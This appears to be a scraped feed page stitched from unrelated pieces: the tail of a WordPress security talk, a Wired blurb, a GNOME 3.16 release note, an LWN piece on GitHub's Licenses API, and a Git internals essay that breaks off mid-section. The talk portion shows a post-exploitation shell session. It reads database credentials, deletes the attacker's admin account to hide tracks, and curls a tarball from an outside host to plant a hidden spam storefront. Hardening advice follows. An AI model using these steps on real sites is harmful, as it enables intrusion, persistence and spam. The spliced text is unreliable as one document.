Now that we know our backdoor works, cover our tracks by doing the following using our WordPress administrator account:

  • Disable the plugin we just installed.
  • Delete the plugin we just installed.
  • We want to delete our administrator account, but we can’t use an account to delete itself. So just log out.

We can delete the administrator user created by the exploit by directly modifying the WordPress database. We can create another administrator user later, if needed.

www-data@myblog2:/var/www/html $ grep DB_ wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'PexpD&F');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -h ost localhost -dbms mysql -query "select * from wordpress.wp_users"
+---+------------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
| 1 | admin      | $P$BzhnOQuKjAFmmMJaVwQzTMppk4Z43C0 | admin | markmont@myblog2.catseye.org |  | 2014-10-03 00:15:16 |  | 0 | admin |
| 2 | dimuHQRery | $P$BS0KP5qd5Vhs4MVZ7ZIoMcIU0R2AjB/ |       |                              |  | 0000-00-00 00:00:00 |  | 0 |       |
+---+------------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "delete from wordpress.wp_users where ID = 2"
[sql.console] No data returned, check credentials and dbms availability.
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "delete from wordpress.wp_usermeta where user_id = 2"
[sql.console] No data returned, check credentials and dbms availability.
www-data@myblog2:/var/www/html $ :sql.console -user wordpress -pass "PexpD&F" -host localhost -dbms mysql -query "select * from wordpress.wp_users"
+---+-------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
| 1 | admin | $P$BzhnOQuKjAFmmMJaVwQzTMppk4Z43C0 | admin | markmont@myblog2.catseye.org |  | 2014-10-03 00:15:16 |  | 0 | admin |
+---+-------+------------------------------------+-------+------------------------------+--+---------------------+--+---+-------+
www-data@myblog2:/var/www/html $ 



We can read the database credentials from wp-config.php and use these to get any information we want from the WordPress database.

Let’s download some HTML files onto the WordPress server to set up an online store in a hidden directory.

The URL for our store will be http://myblog2.catseye.org/wp-content/uploads/2014/10/.store

www-data@myblog2:/var/www/html $ curl -s -O http://www-personal.umich.edu/~markmont/awp/store.tar
www-data@myblog2:/var/www/html $ tar -C /var/www/html -x -f store.tar
www-data@myblog2:/var/www/html $ rm store.tar
www-data@myblog2:/var/www/html $ mv store wp-content/uploads/2014/10/.store
www-data@myblog2:/var/www/html $ ls wp-content/uploads/2014/10/.store
index.html
shopkeepers.jpg
www-data@myblog2:/var/www/html $ ls wp-content/uploads/2014/10
www-data@myblog2:/var/www/html $ 
[!] Exiting. Bye ^^
root@badguy2: ~# 



Now we’re ready to send 15 million emails with the URL to our store!

Screenshot of the attacker's online store on the target web server

This is the end of the presentation, but the slides that follow contain information on how to secure your WordPress site as well as reference material.

Updating:

  1. Check for updates to WordPress, themes, and plugins at least once a week and perform the updates right away.

“But I don’t want to break anything!”

  • Have a “development” site where you try new things first before you do them on your live site. This could even be a WordPress installation on your laptop, if you don’t want to pay for hosting another site.
  • Wait no more than 2-3 days after an update becomes available, check forums for reports of problems, and if there are not any, then upgrade.
  • In the unlikely event that an upgrade breaks something, either downgrade to the previous version (via shell or SFTP access) or restore from backup (you do make regular backups, don’t you?)

You can download for free the BitNami Stack for WordPress from the Mac App Store for a very easy way to run a development WordPress site on your laptop.

A bit more work is using WAMP (Windows) or MAMP (Mac).

Or, for the most control, you can set up a server running Linux as a virtual machine on your laptop and use either a WordPress appliance or roll your own server.

Password concerns:

  • If the only people who log in to your site are you and authors, limit where people can log in from (via web server configuration).
  • Otherwise, use a plugin such as Limit Login Attempts or Login Security Solution that limits the number of login attempts to prevent brute-force password guessing.
  • Don’t make it easy for people to know what WordPress account names exist. Don’t have an account named “admin” (replace it if you have one), and make sure the names displayed for authors are not their login names (set up nicknames instead).

Password concerns:

  • Password guidelines:
    • Do not use the same password for multiple sites or accounts.
    • Do not have a “pattern” of passwords between multiple sites or accounts.
    • Make sure passwords are both long and complex.
  • Best: use random passwords with a password manager such as 1Password or PassPack.
  • Or: use four or more unrelated words (“correct horse battery staple“).
  • Or: use the first letter of each word from a sentence, adding in some numbers and punctuation.

Ars Technica published an article in March 2013 showing how easy it is to crack passwords.

If choosing words, don’t use any phrase — make sure the words are unrelated to each other. Even obscure phrases are easy to crack.

You are protecting two things: make your password hard to guess, and if one of you passwords get stolen (from this or another site) make sure that the attacker cannot use it for anything else.

Because password cracking is so easy, it is also a good idea to limit where users can log in from. Do you really need to log in to your site — without using a VPN — from a coffee shop in Vietnam?

Hosting and SSL:

  • Choose a reputable host that has a good security track record (ask them about guarantees they provide).
    • Prefer a host that lets you install and fully manage WordPress and all its themes and plugins yourself — this way, you are fully in control of your WordPress site’s security.
    • Prefer a host that maintains the operating system, web server, and database server for you, and also does backups for you.
      • Regularly check with your hosting provider to make sure they are staying up to date and running the latest versions of the operating system patches, web server, and database server for whatever distribution they use, and that they are not using a no-longer-supported distribution.
  • Enable SSL (HTTPS) for both your site’s login and admin pages.
    • If you don’t use SSL, your username and password will be sent across the network in clear text, and could be intercepted.
    • Prefer a host that takes care of getting an SSL certificate for you, managing/renewing it, and configuring the web server for SSL so that all you have to do it enable it in WordPress.

Don’t just select a host based on cost!

Web server and filesystem:

  • Block access to wp-includes and wp-admin/includes
  • Block access to .htaccess files
  • Block access to or remove .txt files and README files.
  • Set up a robots.txt file to prevent well-behaved crawlers from trying to index feeds, admin pages, includes, etc.
  • Make sure you never have any file or directory that is writable by anything other than the user that the web server runs as. (The last digit of permissions should always be 0, 4, or 5, never 6 or 7).

Miscellaneous:

  • Secure your database:
    • When installing WordPress, choose a database table prefix other than wp_.
    • Remove the test database.
    • Remove anonymous database users.
    • Make sure that the database is not accessible from the Internet.
  • Enable file editing only when you need it to make changes to your themes. The rest of the time, keep it turned off by having the following line in wp-config.php:
define('DISALLOW_FILE_EDIT', true);
  • Scan your site with WPScan.
  • Note that changing the database prefix won’t stop the exploit we demonstrated today: the Metasploit exploit module determines the database table first before creating the new administrator user. However, changing the database prefix will stop other attacks and so is still worth doing.

    Turning on DISALLOW_FILE_EDIT may be a little paranoid.

    1. Take the site offline (put it into maintenance mode). This prevents the attacker from doing further damage or resisting your attempts to regain control while you are fixing things.
    2. Notify your hosting provider so they can help.
    3. Make a backup of the compromised site in case you need to study it later.
    4. Look at the web server log files to determine how the attacker got in. This will help you know how to fix the problem and what else you might need to look for that the attacker did.
    5. Upgrade everything that can be upgraded.
    6. Remove any files, pages, posts, comments or processes added by the attacker. If in doubt as to whether you got everything, set up a new WordPress site from scratch and then restore your last known good backup into it.
    7. Change all passwords used by the site. Also change your hosting provider and database passwords.
    • Don’t have registered WordPress users for anything except for author and administrator accounts. Use social media accounts for commenters.
    • Don’t deal in sensitive information on your site (credit cards, social security numbers, health information, etc.)
    • Set up automatic daily backups (of both files and database) and test the backups monthly.
    • Keep good notes on how you’ve set up your site, so that you know how everything is supposed to be configured.
    • Have a plan for what to do if you get compromised — who to contact, what to do, how to do it.

    Not using WordPress accounts for commenters removes a large trove of what are very probably horribly weak passwords associated with email addresses.

    Keeping good notes serves several purposes: first, you’ll have a record of how things are supposed to be, so you’ll be able to tell if an attacker changed something; second, you’ll be able to set up a new site with the same settings if needed without worrying if you got everything correct; third, it forces you to be more aware of the choices you’ve made and you’ll have a clearer understanding of the big picture for your site.

    The following sites are useful for finding information about WordPress vulnerabilities and exploits:

    If you want to know about vulnerabilities and how attackers exploit them, the OWASP Top 10 list (above) is a good place to start.

    Also of interest for advanced readers is the analysis of the PHP object serialization vulnerability that was one of the major vulnerabilities fixed in the September 2013 release of WordPress 3.6.1:

    <!– template:

    • [point one]
    • [point two]
    • [point three]
    • [point four]
    • [point five]
    [any material that should appear in print but not on the slide]

    –>


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/CVpdCWoB6sQ/

    Original article

    Tech Luminaries Tackle Big Questions on Small Napkins

    Tech Luminaries Tackle Big Questions on Small Napkins

    NOKIA AND WIRED took the #maketechhuman conversation to TED, convening an all-star gathering of scientists, technologists, executives and thought leaders to ask: “How can we make sure tech serves humanity and not the other way around?” The evening debate addressed both the promise and peril of AI, as well as how to encode it with […]

    The post Tech Luminaries Tackle Big Questions on Small Napkins appeared first on WIRED.




    Original URL: http://feeds.wired.com/c/35185/f/661370/s/44cd3fa7/sc/15/l/0L0Swired0N0C20A150C0A30Ctech0Eluminaries0Etackle0Ebig0Equestions0Esmall0Enapkins0C/story01.htm

    Original article

    GNOME 3.16 Released

    kthreadd writes Version 3.16 of GNOME, the primary desktop environment for GNU/Linux operating systems has been released. Some major new features in this release include a overhauled notification system, an updated design of the calendar drop down and support for overlay scrollbars. Also, the grid view in Files has been improved with bigger thumbnail icons, making the appearance more attractive and the rows easier to read. A video is available which demonstrates the new version.


    Share on Google+

    Read more of this story at Slashdot.


    Original URL: http://rss.slashdot.org/~r/Slashdot/slashdot/~3/6GVitb5jgNk/gnome-316-released

    Original article

    GitHub unveils its Licenses API

    By Nathan Willis
    March 11, 2015

    Since opening its doors in 2008, GitHub has grown to become the largest
    active project-hosting service for open-source software. But it has
    also attracted a fair share of criticism for some of its
    implementation choices—with one of the leading complaints being
    that it takes a lax approach to software licensing. That, in turn,
    leads to a glut of repositories bearing little or no licensing
    details. The company recently announced a new tool to help combat the
    license-confusion issue: a site-wide API for querying and reporting
    license information. Whether that API is up to the task, however,
    remains to be seen.

    None of the above

    By way of background information, GitHub does not require users to
    choose a license when setting up a new project. An existing project
    can also be forked into a new repository with one click, but nothing
    subsequently prevents the new repository’s owner from changing or
    removing the upstream license information (if it exists).

    From a legal standpoint, of course, the fork inherits its
    license from upstream automatically (unless the upstream project is
    public domain or under some other less-common license). But from a
    practical standpoint, this provenance is difficult to
    trace. Throw in other GitHub users submitting pull requests for
    patches that have no license information, and one has a recipe for
    confusion.

    The bigger problem, however, is that the majority of GitHub repositories
    carry no license information at all, because the users who own them
    have not chosen to add such information. In 2013, GitHub introduced
    its first tool designed to combat that issue, launching ChooseALicense.com, a web site
    that explains the features and differences of popular FOSS licenses.

    ChooseALicense.com allows GitHub users to select a license, and the GitHub
    new-project-configuration page has a license selector, but using it is
    not obligatory. In fact, the ChooseALicense.com home page includes
    the following as its last option:

    That “no license” link, incidentally, attempts to explain the downside of selecting no license—most notably, it strongly discourages other
    developers (both FOSS and proprietary) from using or redistributing
    the code in any fashion, for fear of getting entangled in a copyright
    problem. But the page also points out that the GitHub
    terms
    of service
    dictate that other users have the right to view and
    fork any GitHub repository.

    A new interface

    One could probably quibble endlessly over the details of
    ChooseALicense.com and its wording. The upshot, though, is that it
    did not have a serious impact on the license-confusion problem. A
    March 9 post
    on the GitHub blog presented some startling statistics: that less than 20%
    of GitHub repositories have a license, and that the percentage is declining.
    The introduction of the license-selection tool in 2013 produced a
    spike in licensed repositories, followed by a downward trend that
    continues to the present. The post also included some statistics on license
    popularity; the three licenses featured most prominently on the
    license-chooser site (MIT, Apache, and GPLv2) are, unsurprisingly, the
    most often selected.

    This data set, however, is far from complete; as the post
    explains, the team only logged licenses that were found in a file
    named LICENSE, and only matched that file’s contents against
    a short set of known licenses. Nevertheless, GitHub did evidently
    determine that the problem was real enough to warrant a new attempt at
    a solution.

    The team’s answer is a new site-wide API called, fittingly, the Licenses API.
    It is currently in preview, which means that interested developers
    must supply a special HTTP header with any requests in order to access it.

    But the API is, at least currently, a frustratingly limited one.
    It offers just three functions:

    • GET /licenses returns a JSON-formatted list of all of the
      licenses tracked by the site.
    • GET /licenses/licensename returns the license text and
      associated metadata for licensename.
    • GET /repos/username/reponame returns any licensing
      information for username‘s reponame repository (along
      with other repository information).

    Arguably the biggest limitation is that, as was the case with the statistics
    gathered for the blog post, the license of a repository is determined
    only by examining the contents of a LICENSE file. On the
    plus side, the license information returned by the API conforms to the
    Software Package Data Exchange (SPDX) specification, which should make it easy to integrate with
    existing software.

    To be sure, determining and counting licenses is not a simple
    matter—as many in the community know. In 2013, for example, a
    pair of presentations at the Free Software Legal and Licensing
    Workshop explored several strategies for
    tabulating statistics on FOSS license usage. Both presentations ended
    with caveats about the difficulty of the problem—whatever
    methodology is used to approach it.

    Nevertheless, the GitHub Licenses API does appear to be strangely
    naive in its approach. For example, it is well-established that a
    significant number of projects place their license in a file named
    COPYING, rather than LICENSE, because that has long
    been the convention used by the GNU project. Even scanning for that
    filename (or other obvious candidates, like GPL.txt) would
    enhance the quality of the data available significantly. Far better
    would be allowing the repository owner to designate what file contains
    the license.

    Furthermore, the Licenses API could be used to accumulate more
    meaningful statistics, such as which forks include different license
    information than their corresponding upstream repository, but there is
    no indication yet that GitHub intends to pursue such a survey. It may
    fall on volunteers in the community to undertake that sort of
    work. There are, after all, multiple source-code auditing tools that are
    compatible with SPDX and can be used to audit license information and
    compliance. Regrettably, the GitHub Licenses API does not look like it will
    lighten that workload significantly, since the information it returns
    is so restricted in scope.

    Power to choose

    GitHub is right to be concerned about the paucity of license
    information in the repositories hosted at its site. But both the
    2013 license chooser and the new Licenses API seem to
    stem from an assumption on GitHub’s part that the reason so many
    repositories lack licenses is that license selection is either
    confusing or difficult to find information on. Neither effort strikes
    at the heart of the problem: that GitHub makes license selection
    optional and, thus, makes licensing an afterthought.

    SourceForge has long required new projects to select a license while
    performing the initial project setup. Later, when Google Code
    supplanted SourceForge as the hosting service of choice, it, too,
    required the user to select a license during the first step. So too
    do Launchpad.net, GNU Savannah, and BerliOS. FedoraHosted and Debian’s
    Alioth both involve manually requesting access to create a new
    project, a process that, presumably, involves discussing whether or
    not the project will be released under a license compatible with that distribution.

    It is hard to escape the fact that only GitHub and its direct
    competitors (like Gitorious and GitLab) fail to raise the licensing
    question during project setup, and equally hard to avoid the
    conclusion that this is why they are littered with so many
    non-licensed and mis-licensed repositories. An API for querying
    licenses may be a positive step, but it is not
    likely to resolve the problem, since it side-steps the underlying
    issue.

    Hopefully, the current form of the Licenses API is merely the
    beginning, and GitHub will proceed to develop it into a truly useful
    tool. There is certainly a need for one, and being the most active
    project-hosting provider means that GitHub is best positioned to do
    something about it.

    (Log in to post comments)


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/daczAGfea6w/

    Original article

    Git from the inside out

    This essay explains how Git works. It assumes you understand Git well enough to use it to version control your projects.

    The essay focuses on the graph structure that underpins Git and how the properties of this graph dictate Git’s behavior. This focus on fundamentals lets you build your mental model on the truth, rather than on hypotheses constructed from evidence gathered while experimenting with the API. This truer model gives you a better understanding of what Git has done, what it is doing, and what it will do.

    The text is structured as a series of Git commands run on a single project. At intervals, there are observations about the graph data structure that Git is built on. These observations illustrate a property of the graph and the behavior that this property produces.

    After reading, if you wish to go even deeper into Git, you can look at the heavily annotated source code of Gitlet, my implementation of Git in JavaScript.

    Create the project

    ~ $ mkdir alpha
    ~ $ cd alpha
    

    The user creates alpha, a directory for their project.

    ~/alpha $ mkdir data
    ~/alpha $ printf 'a' > data/letter.txt
    

    They move into the alpha directory and create a directory called data. Inside, they create a file called letter.txt that contains a. The alpha directory looks like this:

    alpha
    └── data
        └── letter.txt
    

    Initialize the repository

    ~/alpha $ git init
              Initialized empty Git repository
    

    git init makes the current directory into a Git repository. To do this, it creates a .git directory and writes some files to it. These files define everything about the Git configuration and history of the project. They are just ordinary files. No magic in them. The user can read and edit them with a text editor or shell. Which is to say: the user can read and edit the history of their project as easily as their project files.

    The alpha directory now looks like this:

    alpha
    ├── data
    |   └── letter.txt
    └── .git
        ├── objects
        etc...
    

    The .git directory and its contents are Git’s. All the other files are collectively known as the working copy. They are the user’s.

    Add some files

    ~/alpha $ git add data/letter.txt
    

    The user runs git add on data/letter.txt. This has two effects.

    First, it creates a new blob file in the .git/objects/ directory.

    This blob file contains the compressed content of data/letter.txt. Its name is derived by hashing its content. Hashing a piece of text means running a program on it that turns it into a smaller1 piece of text that uniquely2 identifies the original. For example, Git hashes a to 5e40c0877058c504203932e5136051cf3cd3519b. The first two characters are used as the name of a directory inside the objects database: .git/objects/5e/. The rest of the hash is used as the name of the blob file that holds the content of the added file: .git/objects/5e/40c0877058c504203932e5136051cf3cd3519b.

    Notice how just adding a file to Git saves its content to the objects directory. If the user were to delete data/letter.txt from the working copy, its content would still be safe inside Git.

    Second, git add adds the file to the index. The index is a list that contains every file that Git has been told to keep track of. It is stored as a file at .git/index. Each line of the file maps a tracked file to the hash of its content at the moment it was added. This is the index after the git add command is run:

    data/letter.txt 5e40c0877058c504203932e5136051cf3cd3519b
    

    The user makes a file called data/number.txt that contains 1234.

    ~/alpha $ printf '1234' > data/number.txt
    

    The working copy looks like this:

    alpha
    └── data
        └── letter.txt
        └── number.txt
    

    The user adds the file to Git.

    The git add command creates a blob object that contains the content of data/number.txt. And it adds an index entry for data/number.txt that points the blob. This is the index after the git add command is run a second time:

    data/letter.txt 5e40c0877058c504203932e5136051cf3cd3519b
    data/number.txt 274c0052dd5408f8ae2bc8440029ff67d79bc5c3
    

    Notice that, though the user ran git add data, only the files in the data directory are listed in the index. The data directory is not listed separately.

    ~/alpha $ printf '1' > data/number.txt
    ~/alpha $ git add data
    

    When the user originally created data/number.txt, they meant to type 1, not 1234. They make the correction and add the file to the index again. This command creates a new blob with the new content. And it updates the index entry for data/number.txt to point at the new blob.

    Make a commit

    ~/alpha $ git commit -m 'a1'
              [master (root-commit) c388d51] a1
    

    The user makes the a1 commit. Git prints some data about the commit. These data will make sense shortly.

    The commit command has three steps. It creates a tree graph to represent the content of the version of the project being committed. It creates a commit object. It points the current branch at the new commit object.

    Create a tree graph

    Git records the current state of the project by creating a tree graph from the index. This tree graph records the location and content of every file in the project.

    The graph is composed of two types of object: blobs and trees.

    Blobs are stored by git add. They represent the content of files.

    Trees are stored when a commit is made. A tree represents a directory in the working copy.

    Below is the tree object that records the contents of the data directory for the new commit:

    100664 blob 5e40c0877058c504203932e5136051cf3cd3519b letter.txt
    100664 blob 274c0052dd5408f8ae2bc8440029ff67d79bc5c3 number.txt
    

    The first line records everything required to reproduce data/letter.txt. The first part states the file’s permissions. The second part states that the content of this entry is represented by a blob, rather than a tree. The third part states the hash of the blob. The fourth part states the file’s name.

    The second line records the same for data/number.txt.

    Below is the tree object for alpha, the root directory of the project:

    040000 tree 0eed1217a2947f4930583229987d90fe5e8e0b74 data
    

    The sole line in this tree points at the data tree.

    Tree graph for the `a1` commit

    Tree graph for the a1 commit

    In the graph above, the alpha tree points at the data tree. The data tree points at the blobs for data/letter.txt and data/number.txt.

    Create a commit object

    After creating the tree graph, git commit creates a commit object. This is just another text file in .git/objects/:

    tree ffe298c3ce8bb07326f888907996eaa48d266db4
    author Mary Rose Cook  1424798436 -0500
    committer Mary Rose Cook  1424798436 -0500
    
    a1
    

    The first line points at the tree graph. The hash is for the tree object that represents the root of the working copy. That is: the alpha directory. The last line is the commit message.

    `a1` commit object pointing at its tree graph

    a1 commit object pointing at its tree graph

    Point the current branch at the new commit

    Finally, the commit command points the current branch at the new commit object.

    Which is the current branch? To find out, Git goes to the HEAD file at .git/HEAD and finds:

    This says that HEAD is pointing at master. master is the current branch.

    HEAD and master are both refs. A ref is a label used by Git or the user to identify a specific commit.

    The file that represents the master ref does not exist, because this is the first commit to the repository. Git creates the file at .git/refs/heads/master and sets its content to the hash of the commit object:

    a87cc0f39d12e51be8d68eab5cef1d31e8807a1c
    

    Let’s add HEAD and master to the Git graph:

    `master` pointing at the `a1` commit

    HEAD pointing at master and master pointing at the a1 commit

    HEAD points at master, as it did before the commit. But master now exists and points at the new commit object.

    Make a commit that is not the first commit

    Below is the Git graph after the a1 commit. The working copy and index are included.

    `a1` commit shown with the working copy and index

    a1 commit shown with the working copy and index

    Notice that the working copy, index, and a1 commit all have the same content for data/letter.txt and data/number.txt. Notice that the index and HEAD commit both use hashes to refer to blob objects, but the working copy content is stored as text in a different place.

    ~/alpha $ printf '2' > data/number.txt
    

    The user sets the content of data/number.txt to 2. This updates the working copy, but leaves the index and HEAD commit as they are.

    `data/number.txt` set to `2` in the working copy

    data/number.txt set to 2 in the working copy

    ~/alpha $ git add data/number.txt
    

    The user adds the file to Git. This adds a blob containing 2 to the objects directory. And it points the index entry for data/number.txt at the new blob.

    `data/number.txt` set to `2` in the working copy and index

    data/number.txt set to 2 in the working copy and index

    ~/alpha $ git commit -m 'a2'
              [master ae78f19] a2
    

    The user commits. The steps for the commit are the same as before.

    First, a new tree graph is created to represent the content of the index.

    The index entry for data/number.txt has changed. The old data tree no longer reflects the indexed state of the data directory. A new data tree object must be created:

    100664 blob 2e65efe2a145dda7ee51d1741299f848e5bf752e letter.txt
    100664 blob d8263ee9860594d2806b0dfd1bfd17528b0ba2a4 number.txt
    

    The new data tree hashes to a value that is different from the old data tree. A new alpha tree must be created to record this hash:

    040000 tree 40b0318811470aaacc577485777d7a6780e51f0b data
    

    Second, a new commit object is created.

    tree ce72afb5ff229a39f6cce47b00d1b0ed60fe3556
    parent 30ec3334aaa3954ef44fb6b68cfbf1a225c3d5af
    author Mary Rose Cook  1424813101 -0500
    committer Mary Rose Cook  1424813101 -0500
    
    a2
    

    The first line of the commit object points at the new alpha tree object. The second line points at the commit’s parent, a1. To find the parent commit, Git went to HEAD, followed it to master and found the commit hash of a1.

    Third, the content of the master branch file is set to the hash of the new commit.

    `a2` commit

    a2 commit

    Git graph without the working copy and index

    Git graph without the working copy and index

    Graph property: content is stored as a tree of objects. This means that only diffs are stored in the objects database. Look at the graph above. The a2 commit reuses the a blob that was made before the a1 commit. Similarly, if a whole directory doesn’t change from commit to commit, its tree and all the blobs and trees below it can be reused. Generally, there are few content changes from commit to commit. This means that Git can store large commit histories in a small amount of space.

    Graph property: each commit has a parent. This means that a repository can store the history of a project.

    Graph property: refs are entry points to one part of the commit history or another. This means that commits can be given meaningful names. The user organizes their work into lineages that are meaningful to their project with concrete refs like fix-for-bug-376. Git uses symbolic refs like HEAD, MERGE_HEAD and FETCH_HEAD to support commands that manipulate the commit history.

    Graph property: the nodes in the objects/ directory are immutable. This means that content is edited, not deleted. Every piece of content ever added and every commit ever made is somewhere in the objects directory3.

    Graph property: refs are mutable. Therefore, the meaning of a ref can change. The commit that master points at might be the best version of a project at the moment, but, soon enough, it will be superseded by a newer and better commit.

    Graph property: the working copy and the commits pointed at by refs are readily available, but other commits are not. This means that recent history is easier to recall, but that it also changes more often. Or: Git has a fading memory that must be jogged with increasingly vicious prods.

    The working copy is the easiest point in history to recall because it is in the root of the repository. Recalling it doesn’t even require a Git command. It is also the least permanent point in history. The user can make a dozen versions of a file, but, unless they are added, Git won’t record any of them.

    The commit that HEAD points at is very easy to recall. It is at the tip of the branch that is checked out. To see its content, the user can just stash4 and then examine the working copy. At the same time, HEAD is the most frequently changing ref.

    The commit that a concrete ref points at is easy to recall. The user can simply check out that branch. The tip of a branch changes less often than HEAD, but still often enough for the meaning of a branch name to be changeable.

    It is difficult to recall a commit that is not pointed at by any ref. And, the further the user goes from a ref, the harder it will be for them to construct the meaning of a commit. But, the further back they go, the less likely it is that someone will have changed history since they last looked5.

    Check out a commit

    ~/alpha $ git checkout 37888c2
              You are in 'detached HEAD' state...
    

    The user checks out the a2 commit using its hash. (If you are running these Git commands, this one won’t work. Use git log to find the hash of your a2 commit.)

    Checking out has four steps.

    First, Git gets the a2 commit and gets the tree graph it points at.

    Second, it writes the file entries in the tree graph to the working copy. This results in no changes. Because HEAD was already pointing (via master) at the a2 commit, the working copy already has the content of the tree graph being written to it.

    Third, Git writes the file entries in the tree graph to the index. This, too, results in no changes. The index already has the content of the a2 commit.

    Fourth, the content of HEAD is set to the hash of the a2 commit:

    37888c274ecb894b656829d55e88cd086c9b2f72
    

    Setting the content of HEAD to a hash puts the repository in the detached HEAD state. Notice in the graph below that HEAD, rather than pointing at master, points directly at the a2 commit.

    Detached `HEAD` on `a2` commit

    Detached HEAD on a2 commit

    ~/alpha $ printf '3' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'a3'
              [master 05f9ae6] a3
    

    The user sets the content of data/number.txt to 3 and commits the change. To get the parent of the a3 commit, Git goes to HEAD. Instead of finding and following a branch ref, it finds and returns the hash of the a2 commit.

    Git updates HEAD to point directly at the hash of the new a3 commit. The repository is still in the detached HEAD state. Because no commit points at either a3 or one of its descendants, it is not on a branch. This means it is easy to lose.

    Note that, from now on, trees and blobs will mostly be omitted from the graph diagrams.

    `a3` commit that is not on a branch

    a3 commit that is not on a branch

    Create a branch

    ~/alpha $ git branch deputy
    

    The user creates a new branch called deputy. This just creates a new file at .git/refs/heads/deputy that contains the hash that HEAD is pointing at. That is, the hash of the a3 commit.

    Graph property: branches are just refs and refs are just files. This means that Git branches are lightweight.

    The creation of the deputy branch puts the new a3 commit safely on a branch. HEAD is still detached because it still points directly at a commit.

    `a3` commit now on the `deputy` branch

    a3 commit now on the deputy branch

    Check out a branch

    ~/alpha $ git checkout master
              Switched to branch 'master'
    

    The user checks out the master branch.

    First, Git gets the a2 commit that master points at and gets the tree graph the commit points at.

    Second, Git writes the file entries in the tree graph to the files of the working copy. This sets the content of data/number.txt to 2.

    Third, Git writes the file entries in the tree graph to the index. This updates the entry for data/number.txt to the hash of the 2 blob.

    Fourth, Git points HEAD at master by changing its content from a hash to:

    `master` checked out and pointing at the `a2` commit

    master checked out and pointing at the a2 commit

    Check out a branch that is incompatible with the working copy

    ~/alpha $ printf '789' > data/number.txt
    ~/alpha $ git checkout deputy
              Your changes to these files would be overwritten
              by checkout:
                data/number.txt
              Commit your changes or stash them before you
              switch branches.
    

    The user accidentally sets the content of data/number.txt to 789. They try to check out deputy. Git prevents the check out.

    HEAD points at master which points at a2 where data/number.txt reads 2. deputy points at a3 where data/number.txt reads 3. The working copy version of data/number.txt reads 789. All these versions are different and they must be resolved.

    Git could replace the working copy version of data/number.txt with the version in the commit being checked out. But it avoids data loss at all costs.

    Git could merge the working copy version with the version being checked out. But this is complicated.

    So, Git aborts the check out.

    ~/alpha $ printf '2' > data/number.txt
    ~/alpha $ git checkout deputy
              Switched to branch 'deputy'
    

    The user notices that they accidentally edited data/number.txt and sets the content back to 2. They check out deputy successfully.

    `deputy` checked out

    deputy checked out

    Merge an ancestor

    ~/alpha $ git merge master
              Already up-to-date.
    

    The user merges master into deputy. Merging two branches means merging two commits. The first commit is the one that deputy points at: the receiver. The second commit is the one that master points at: the giver. For this merge, Git does nothing, reporting it is Already up-to-date..

    Graph property: the series of commits in the graph are interpreted as a series of changes made to the content of the repository. This means that, in a merge, if the giver commit is an ancestor of the receiver commit, Git will do nothing. Those changes have already been incorporated.

    Merge a descendent

    ~/alpha $ git checkout master
              Switched to branch 'master'
    

    The user checks out master.

    `master` checked out and pointing at the `a2` commit

    master checked out and pointing at the a2 commit

    ~/alpha $ git merge deputy
              Fast-forward
    

    They merge deputy into master. Git discovers that the receiver commit, a2, is an ancestor of the giver commit, a3. This means it can do a fast-forward merge.

    It gets the giver commit and gets the tree graph that it points at. It writes the file entries in the tree graph to the working copy and the index. It “fast-forwards” master to point at a3.

    `a3` commit from `deputy` fast-forward merged into `master`

    a3 commit from deputy fast-forward merged into master

    Graph property: the series of commits in the graph are interpreted as a series of changes made to the content of the repository. This means that, in a merge, if the giver is a descendent of the receiver, history is not changed. There is already a sequence of commits that describe the change to make: the sequence of commits between the receiver and the giver. But, though the Git history doesn’t change, the Git graph does change. The concrete ref that HEAD points at is updated to point at the giver commit.

    Merge two commits from different lineages

    ~/alpha $ printf '4' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'a4'
              [master c6b955e] a4
    

    The user sets the content of number.txt to 4 and commits the change to master.

    ~/alpha $ git checkout deputy
              Switched to branch 'deputy'
    ~/alpha $ printf 'b' > data/letter.txt
    ~/alpha $ git add data/letter.txt
    ~/alpha $ git commit -m 'b3'
              [deputy d75b998] b3
    

    The user checks out deputy. They set the content of data/letter.txt to b and commit the change to deputy.

    `a4` committed to `master`, `b3` committed to `deputy` and `deputy` checked out

    a4 committed to master, b3 committed to deputy and deputy checked out

    Graph property: commits can share parents. This means that new lineages can be created in the commit history.

    Graph property: commits can have multiple parents. This means that separate lineages can be joined by a commit with two parents: a merge commit.

    ~/alpha $ git merge master -m 'b4'
              Merge made by the 'recursive' strategy.
    

    The user merges master into deputy.

    Git discovers that the receiver, b3, and the giver, a4, are in different lineages. It makes a merge commit. This process has eight steps.

    First, Git writes the hash of the giver commit to a file at alpha/.git/MERGE_HEAD. The presence of this file tells Git it is in the middle of merging.

    Second, Git finds the base commit: the most recent ancestor that the receiver and giver commits have in common.

    `a3`, the base commit of `a4` and `b3`

    a3, the base commit of a4 and b3

    Graph property: commits have parents. This means that it is possible to find the point at which two lineages diverged. Git traces backwards from b3 to find all its ancestors and backwards from a4 to find all its ancestors. It finds the most recent ancestor shared by both lineages, a3. This is the base commit.

    Third, Git generates the indices for the base, receiver and giver commits from their tree graphs.

    Fourth, Git generates a diff that contains the changes required to go from the content of the receiver commit to the content of the giver commit. This diff is a list of file paths that point to a change: add, remove, modify or conflict.

    Git gets the list of all the files that appear in the base, receiver or giver indices. For each one, it compares the index entries to find the change that was made to the file. It writes a corresponding entry to the diff. In this case, the diff has two entries.

    The first entry is for data/letter.txt. The content of this file is a in the base, b in the receiver and a in the giver. The content is different in the base and receiver. But it is the same in the base and giver. Git sees that the content was modified by the giver but not the receiver. The diff entry for data/letter.txt is a modification, not a conflict.

    The second entry in the diff is for data/number.txt. In this case, the content is the same in the base and receiver, and different in the giver. The diff entry for data/letter.txt is also a modification.

